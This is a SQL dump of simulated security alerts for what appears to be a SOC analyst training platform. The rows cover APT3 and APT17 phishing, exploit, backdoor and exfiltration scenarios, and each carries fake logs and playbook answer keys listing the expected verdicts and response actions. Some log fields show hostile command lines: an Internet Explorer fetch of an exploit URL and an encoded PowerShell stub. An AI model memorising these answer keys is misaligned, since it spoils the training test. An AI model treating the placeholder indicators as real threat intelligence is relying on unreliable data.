NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1214, 'Data Exfiltration Attempted', 'critical', 'Data Loss Prevention System', 'During the final stage of the attack, APT17 attempted to exfiltrate sensitive data to an external server. This action was detected and blocked by the Data Loss Prevention System. The attack leveraged a compromised internal host to send data to a known malicious IP address.', 'Exfiltration', 'T1041: Exfiltration Over C2 Channel', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:35:22Z\",\"event_id\":\"DLP-Exfil-20231015-001\",\"source_ip\":\"10.0.5.23\",\"destination_ip\":\"192.0.2.45\",\"protocol\":\"HTTPS\",\"filename\":\"confidential_data.zip\",\"file_hash\":\"3e23e8160039594a33894f6564e1b134\",\"username\":\"jdoe\",\"process_name\":\"data_exfil.exe\",\"malicious_ip\":true,\"tags\":[\"APT17\",\"Exfiltration\",\"Critical\"]}', '2026-02-07 21:25:01', '2026-02-14 17:02:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.0.2.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with APT17 C2 activities.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3e23e8160039594a33894f6564e1b134\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash linked to exfiltration malware used by APT17.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.5.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Management\",\"verdict\":\"internal\",\"details\":\"Internal host used during exfiltration attempt.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"DLP Logs\",\"verdict\":\"suspicious\",\"details\":\"Sensitive data marked for unauthorized exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:02.536Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:35:22Z\\\",\\\"event_id\\\":\\\"DLP-Exfil-20231015-001\\\",\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"192.0.2.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"file_hash\\\":\\\"3e23e8160039594a33894f6564e1b134\\\",\\\"username\\\":\\\"jdoe\\\",\\\"process_name\\\":\\\"data_exfil.exe\\\",\\\"malicious_ip\\\":true,\\\"tags\\\":[\\\"APT17\\\",\\\"Exfiltration\\\",\\\"Critical\\\"]}\"},{\"timestamp\":\"2026-02-08T18:59:02.536Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:35:22Z\\\",\\\"event_id\\\":\\\"DLP-Exfil-20231015-001\\\",\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"192.0.2.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"file_hash\\\":\\\"3e23e8160039594a33894f6564e1b134\\\",\\\"username\\\":\\\"jdoe\\\",\\\"process_name\\\":\\\"data_exfil.exe\\\",\\\"malicious_ip\\\":true,\\\"tags\\\":[\\\"APT17\\\",\\\"Exfiltration\\\",\\\"Critical\\\"]}\"},{\"timestamp\":\"2026-02-08T18:58:02.536Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:35:22Z\\\",\\\"event_id\\\":\\\"DLP-Exfil-20231015-001\\\",\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"192.0.2.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"file_hash\\\":\\\"3e23e8160039594a33894f6564e1b134\\\",\\\"username\\\":\\\"jdoe\\\",\\\"process_name\\\":\\\"data_exfil.exe\\\",\\\"malicious_ip\\\":true,\\\"tags\\\":[\\\"APT17\\\",\\\"Exfiltration\\\",\\\"Critical\\\"]}\"},{\"timestamp\":\"2026-02-08T18:57:02.536Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:35:22Z\\\",\\\"event_id\\\":\\\"DLP-Exfil-20231015-001\\\",\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"192.0.2.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"file_hash\\\":\\\"3e23e8160039594a33894f6564e1b134\\\",\\\"username\\\":\\\"jdoe\\\",\\\"process_name\\\":\\\"data_exfil.exe\\\",\\\"malicious_ip\\\":true,\\\"tags\\\":[\\\"APT17\\\",\\\"Exfiltration\\\",\\\"Critical\\\"]}\"},{\"timestamp\":\"2026-02-08T18:56:02.536Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:35:22Z\\\",\\\"event_id\\\":\\\"DLP-Exfil-20231015-001\\\",\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"192.0.2.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"file_hash\\\":\\\"3e23e8160039594a33894f6564e1b134\\\",\\\"username\\\":\\\"jdoe\\\",\\\"process_name\\\":\\\"data_exfil.exe\\\",\\\"malicious_ip\\\":true,\\\"tags\\\":[\\\"APT17\\\",\\\"Exfiltration\\\",\\\"Critical\\\"]}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1215, 'Suspicious Phishing Email Detected', 'medium', 'Email Gateway Logs', 'A phishing email from APT3 was detected, containing a malicious link exploiting the CVE-2014-1776 vulnerability in Internet Explorer. The email was sent to a user within the network in an attempt to gain initial access.', 'Phishing', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-20T14:55:02Z\",\"email_id\":\"20231020-00123\",\"from\":\"attack@maliciousdomain.com\",\"to\":\"user@company.com\",\"subject\":\"Urgent: Update Your Account Information\",\"body\":\"Dear user, please update your account information using the following link: http://maliciousdomain.com/update\",\"attachments\":[],\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"malicious_link\":\"http://maliciousdomain.com/update\",\"exploit_cve\":\"CVE-2014-1776\"}', '2026-02-07 21:28:29', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"DomainReputationService\",\"verdict\":\"malicious\",\"details\":\"Domain linked to multiple phishing attacks\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://maliciousdomain.com/update\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL hosting phishing content\"}},{\"id\":\"artifact_4\",\"type\":\"email\",\"value\":\"attack@maliciousdomain.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"EmailReputationService\",\"verdict\":\"malicious\",\"details\":\"Email address used in previous phishing campaigns\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Phishing Email Detected\",\"date\":\"2026-02-08T19:00:02.538Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1216, 'Malicious Script Execution on User System', 'high', 'Endpoint Detection and Response (EDR)', 'A malicious script executed on the user system via a phishing email\'s link. The link triggers a script in Internet Explorer, exploiting a zero-day vulnerability to execute a payload, leading to potential system compromise.', 'Execution', 'T1203 Exploitation for Client Execution', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T13:45:30Z\",\"event_type\":\"malicious_script_execution\",\"host_ip\":\"192.168.1.15\",\"user\":\"jdoe\",\"process\":{\"name\":\"iexplore.exe\",\"pid\":4587,\"command_line\":\"\\\"C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe\\\" http://malicious-example.com/exploit\"},\"network\":{\"source_ip\":\"192.168.1.15\",\"destination_ip\":\"203.0.113.45\",\"destination_port\":80},\"file\":{\"name\":\"exploit_payload.js\",\"path\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\exploit_payload.js\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"indicators\":[{\"type\":\"ip\",\"value\":\"203.0.113.45\",\"role\":\"attacker\"},{\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"role\":\"malicious_script\"}]}', '2026-02-07 21:28:29', '2026-02-19 15:53:20', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activity.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Malware hash linked to recent exploit scripts.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1217, 'Pirpi Backdoor Installation', 'medium', 'File Integrity Monitoring', 'The File Integrity Monitoring system detected the installation of the Pirpi backdoor, which is known to be used by APT3 to maintain persistent access to compromised systems. The malware was installed after successful execution, allowing the attacker to establish a foothold within the network.', 'Persistence', 'T1546.006', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T08:45:23Z\",\"event_id\":\"FIM-20231012-0001\",\"internal_ip\":\"192.168.1.45\",\"external_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"filename\":\"C:\\\\Windows\\\\System32\\\\pirpi.dll\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"detected_event\":\"File Created\",\"action_taken\":\"Alerted\",\"description\":\"The file pirpi.dll was created in the System32 directory, associated with APT3 activity.\"}', '2026-02-07 21:28:29', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP range\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known APT3 command and control server\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"C:\\\\Windows\\\\System32\\\\pirpi.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis\",\"verdict\":\"malicious\",\"details\":\"Pirpi backdoor associated with APT3\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Pirpi malware\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user account\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:02.540Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:45:23Z\\\",\\\"event_id\\\":\\\"FIM-20231012-0001\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\pirpi.dll\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"detected_event\\\":\\\"File Created\\\",\\\"action_taken\\\":\\\"Alerted\\\",\\\"description\\\":\\\"The file pirpi.dll was created in the System32 directory, associated with APT3 activity.\\\"}\"},{\"timestamp\":\"2026-02-08T18:59:02.540Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:45:23Z\\\",\\\"event_id\\\":\\\"FIM-20231012-0001\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\pirpi.dll\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"detected_event\\\":\\\"File Created\\\",\\\"action_taken\\\":\\\"Alerted\\\",\\\"description\\\":\\\"The file pirpi.dll was created in the System32 directory, associated with APT3 activity.\\\"}\"},{\"timestamp\":\"2026-02-08T18:58:02.540Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:45:23Z\\\",\\\"event_id\\\":\\\"FIM-20231012-0001\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\pirpi.dll\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"detected_event\\\":\\\"File Created\\\",\\\"action_taken\\\":\\\"Alerted\\\",\\\"description\\\":\\\"The file pirpi.dll was created in the System32 directory, associated with APT3 activity.\\\"}\"},{\"timestamp\":\"2026-02-08T18:57:02.540Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:45:23Z\\\",\\\"event_id\\\":\\\"FIM-20231012-0001\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\pirpi.dll\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"detected_event\\\":\\\"File Created\\\",\\\"action_taken\\\":\\\"Alerted\\\",\\\"description\\\":\\\"The file pirpi.dll was created in the System32 directory, associated with APT3 activity.\\\"}\"},{\"timestamp\":\"2026-02-08T18:56:02.540Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:45:23Z\\\",\\\"event_id\\\":\\\"FIM-20231012-0001\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\pirpi.dll\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"detected_event\\\":\\\"File Created\\\",\\\"action_taken\\\":\\\"Alerted\\\",\\\"description\\\":\\\"The file pirpi.dll was created in the System32 directory, associated with APT3 activity.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1218, 'Unauthorized Credential Access Detected', 'high', 'Network Traffic Analysis', 'APT3 utilizes the Pirpi backdoor to access and harvest user credentials. This activity is indicative of preparation for lateral movement within the network.', 'Credential Access', 'T1078 - Valid Accounts', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-07T14:23:45Z\",\"destination_ip\":\"10.0.5.15\",\"source_ip\":\"203.0.113.45\",\"protocol\":\"HTTP\",\"http_method\":\"POST\",\"url\":\"/login.php\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"username\":\"jdoe\",\"file_hash\":\"3fae2c2d4b0b5b5b7f6d8f2a2b7c8d9e\",\"filename\":\"pirpi_backdoor.exe\",\"http_status\":200}', '2026-02-07 21:28:29', '2026-02-19 15:51:23', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with APT3 operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host suspected of compromise.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3fae2c2d4b0b5b5b7f6d8f2a2b7c8d9e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Pirpi backdoor.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user account used in unauthorized access.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"pirpi_backdoor.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"File associated with APT3\'s Pirpi backdoor.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1219, 'Data Exfiltration Attempt Via Encrypted Channels', 'high', 'Data Loss Prevention (DLP) Systems', 'The final step in APT3\'s campaign attempts to exfiltrate sensitive data through encrypted channels, aiming to avoid detection. The attack was detected when a large volume of data was being sent from an internal server to an unfamiliar external IP address using HTTPS. The data transfer was flagged by DLP systems due to the encrypted channel and the large volume of data.', 'Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T08:45:32Z\",\"event_id\":\"exfiltration_attempt_98765\",\"source_ip\":\"192.168.1.10\",\"destination_ip\":\"198.51.100.25\",\"protocol\":\"HTTPS\",\"data_volume\":\"150MB\",\"filename\":\"confidential_data.zip\",\"user\":\"jdoe\",\"hash\":\"3d2e479b2f4e3f9a4c3b2e1d4f5a7b8c\",\"action\":\"blocked\",\"detection_method\":\"DLP\"}', '2026-02-07 21:28:29', '2026-02-19 15:53:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the server attempting data exfiltration.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"external_network\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known malicious activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3d2e479b2f4e3f9a4c3b2e1d4f5a7b8c\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"suspicious\",\"details\":\"Hash linked to tools used in data exfiltration activity.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"dlp_system\",\"verdict\":\"suspicious\",\"details\":\"File flagged by DLP due to large size and sensitive content.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:02.544Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:45:32Z\\\",\\\"event_id\\\":\\\"exfiltration_attempt_98765\\\",\\\"source_ip\\\":\\\"192.168.1.10\\\",\\\"destination_ip\\\":\\\"198.51.100.25\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"data_volume\\\":\\\"150MB\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"user\\\":\\\"jdoe\\\",\\\"hash\\\":\\\"3d2e479b2f4e3f9a4c3b2e1d4f5a7b8c\\\",\\\"action\\\":\\\"blocked\\\",\\\"detection_method\\\":\\\"DLP\\\"}\"},{\"timestamp\":\"2026-02-08T18:59:02.544Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:45:32Z\\\",\\\"event_id\\\":\\\"exfiltration_attempt_98765\\\",\\\"source_ip\\\":\\\"192.168.1.10\\\",\\\"destination_ip\\\":\\\"198.51.100.25\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"data_volume\\\":\\\"150MB\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"user\\\":\\\"jdoe\\\",\\\"hash\\\":\\\"3d2e479b2f4e3f9a4c3b2e1d4f5a7b8c\\\",\\\"action\\\":\\\"blocked\\\",\\\"detection_method\\\":\\\"DLP\\\"}\"},{\"timestamp\":\"2026-02-08T18:58:02.544Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:45:32Z\\\",\\\"event_id\\\":\\\"exfiltration_attempt_98765\\\",\\\"source_ip\\\":\\\"192.168.1.10\\\",\\\"destination_ip\\\":\\\"198.51.100.25\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"data_volume\\\":\\\"150MB\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"user\\\":\\\"jdoe\\\",\\\"hash\\\":\\\"3d2e479b2f4e3f9a4c3b2e1d4f5a7b8c\\\",\\\"action\\\":\\\"blocked\\\",\\\"detection_method\\\":\\\"DLP\\\"}\"},{\"timestamp\":\"2026-02-08T18:57:02.544Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:45:32Z\\\",\\\"event_id\\\":\\\"exfiltration_attempt_98765\\\",\\\"source_ip\\\":\\\"192.168.1.10\\\",\\\"destination_ip\\\":\\\"198.51.100.25\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"data_volume\\\":\\\"150MB\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"user\\\":\\\"jdoe\\\",\\\"hash\\\":\\\"3d2e479b2f4e3f9a4c3b2e1d4f5a7b8c\\\",\\\"action\\\":\\\"blocked\\\",\\\"detection_method\\\":\\\"DLP\\\"}\"},{\"timestamp\":\"2026-02-08T18:56:02.544Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:45:32Z\\\",\\\"event_id\\\":\\\"exfiltration_attempt_98765\\\",\\\"source_ip\\\":\\\"192.168.1.10\\\",\\\"destination_ip\\\":\\\"198.51.100.25\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"data_volume\\\":\\\"150MB\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"user\\\":\\\"jdoe\\\",\\\"hash\\\":\\\"3d2e479b2f4e3f9a4c3b2e1d4f5a7b8c\\\",\\\"action\\\":\\\"blocked\\\",\\\"detection_method\\\":\\\"DLP\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
